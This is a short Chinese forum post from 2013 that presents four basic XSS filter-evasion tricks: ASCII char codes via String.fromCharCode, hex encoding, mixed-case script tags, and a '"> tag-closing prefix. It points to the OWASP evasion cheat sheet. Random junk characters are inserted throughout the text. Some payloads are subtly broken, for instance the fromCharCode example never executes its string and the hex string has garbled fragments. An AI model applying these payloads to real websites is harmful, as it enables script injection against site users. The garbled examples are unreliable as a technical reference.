四种超级基础的绕过方法。! w1 P$ \9 u- y( ^
1.转换为ASCII码
3 o9 H1 i" r8 W5 L+ c例子:原脚本为<script>alert(‘I love F4ck’)</script >
: B1 b$ M- o, m7 y通过转换,变成:. Q7 B5 D# O( H: l
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>5 x2 s4 y8 L) ]% ]$ D
+ u/ q( U/ S9 h7 d3 k8 a7 s
2.转换为HEX(十六进制)) I. l; A% A$ c8 l2 D# {# R
例子:原脚本为<script>alert(‘I love F4ck’)</script>5 D) R1 z/ i6 Z1 E! j R6 i; d
通过转换,变成:
: g2 E8 `) B! Z" s% q1 D W%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
4 w, n% e. k; A Y* F 1 x, [$ n5 P5 |. f) F o! p
3.转换脚本的大小写4 Y8 f' m+ P) ]; B
例子:原脚本为<script>alert(‘I love F4ck’)</script>; U0 c$ o+ [# u& Q8 w
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>: P9 B/ [! `1 z( P J' l
6 ]7 v/ k8 ?* q: j* g* F; K4.增加闭合标记”>
* E5 \. A$ Y+ b! M) B: S例子:原脚本为<script>alert(‘I love F4ck’)</script>: A7 Y, V$ e4 B, e
转换为:”><script>alert(‘I love F4ck’)</script>0 M- f9 T& N n1 w" ^5 H* ?
更详细绕过技术请参考此网页
+ T- `9 a' x9 |: v- shttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet$ Y0 J) c- d" K) ~" k1 {2 {
0 `7 ]5 W. _& N H. }转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对